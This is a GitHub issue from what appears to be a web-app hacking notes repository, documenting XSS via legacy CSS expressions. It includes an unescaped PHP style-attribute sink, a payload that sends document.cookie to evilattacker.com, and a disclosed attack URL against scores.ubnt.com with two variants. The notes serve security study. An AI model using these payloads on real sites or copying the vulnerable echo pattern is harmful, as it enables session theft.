Web-App-Hacking-Notes icon indicating copy to clipboard operation
Web-App-Hacking-Notes copied to clipboard

Published 20 hours ago verified publisher icon tcpiplab

Create notes about XSS via CSS expressions

Open tcpiplab opened this issue 7 years ago • 3 comments

From @padraic's book which is at his phpsecurity repository:

On the server:

<div style="background:<?php echo $colour ?>;">

Injection payload:

$colour = "expression(document.write('<iframe src="     .= "http://evilattacker.com?cookie=' + document.cookie.escape() + "     .= "' height=0 width=0 />'))"; <div style="background:<?php echo $colour ?>;">

tcpiplab avatar Apr 07 '17 23:04 tcpiplab

Sitepoint has a good page documenting CSS expressions.

tcpiplab avatar Apr 07 '17 23:04 tcpiplab

I first heard of CSS expressions as an XSS payload from a publicly disclosed bug on hackerone.com:

Reflected cross-site scripting (XSS) vulnerability in scores.ubnt.com allows attackers to inject arbitrary web script via p parameter.

Attack:

https://scores.ubnt.com/form.html?uid=259&p=airFiber);xss:expression(alert(1));border-image:url(foobar

Two options for the payloadb:

);xss:expression(alert(1));border-image:url(foobar
);border-image: url(javascript:alert(1));content:url(foobar

tcpiplab avatar Apr 08 '17 00:04 tcpiplab

This attack targets older IE browsers. But it supposedly works with Chrome, which I will test.

tcpiplab avatar Apr 08 '17 00:04 tcpiplab